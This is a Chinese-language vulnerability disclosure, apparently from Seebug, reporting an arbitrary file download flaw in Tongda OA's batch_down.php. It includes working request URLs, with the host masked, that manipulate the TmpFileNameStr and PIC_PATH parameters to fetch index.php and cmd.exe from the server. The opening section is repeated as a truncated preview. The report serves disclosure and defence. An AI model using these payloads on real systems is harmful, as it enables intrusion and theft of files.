### 简要描述: 通达OA任意版本任意文件下载漏洞,可以下载电脑上任意文件。 官网最新版作演示: ### 详细说明: 正常下载图片: http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF [<img src="https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png" alt="oa1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png) [<img src="https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png" alt="oa2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png) [<img src="https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png" alt="oa3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png) 修改路径下载文件: 下载index.php:...
### 简要描述: 通达OA任意版本任意文件下载漏洞,可以下载电脑上任意文件。 官网最新版作演示: ### 详细说明: 正常下载图片: http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF [<img src="https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png" alt="oa1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png) [<img src="https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png" alt="oa2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png) [<img src="https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png" alt="oa3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png) 修改路径下载文件: 下载index.php: http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot [<img src="https://images.seebug.org/upload/201512/021257340f80e7e42e5a47508798f0f8b2de785f.png" alt="oa4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/021257340f80e7e42e5a47508798f0f8b2de785f.png) [<img src="https://images.seebug.org/upload/201512/0212574657426cf6e422e60f579310a8500d361f.png" alt="oa5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/0212574657426cf6e422e60f579310a8500d361f.png) [<img src="https://images.seebug.org/upload/201512/02125757f9bae3ade27d1d070cf410df57b4b516.png" alt="oa6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125757f9bae3ade27d1d070cf410df57b4b516.png) 下载cmd.exe: http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32 [<img src="https://images.seebug.org/upload/201512/021258470ff00bd297d419e93751cce5737baded.png" alt="oa7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/021258470ff00bd297d419e93751cce5737baded.png) [<img src="https://images.seebug.org/upload/201512/02125856f26668ebb0e398c01b6996b1ac9dfbd0.png" alt="oa8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/02125856f26668ebb0e398c01b6996b1ac9dfbd0.png) ### 漏洞证明: 如上。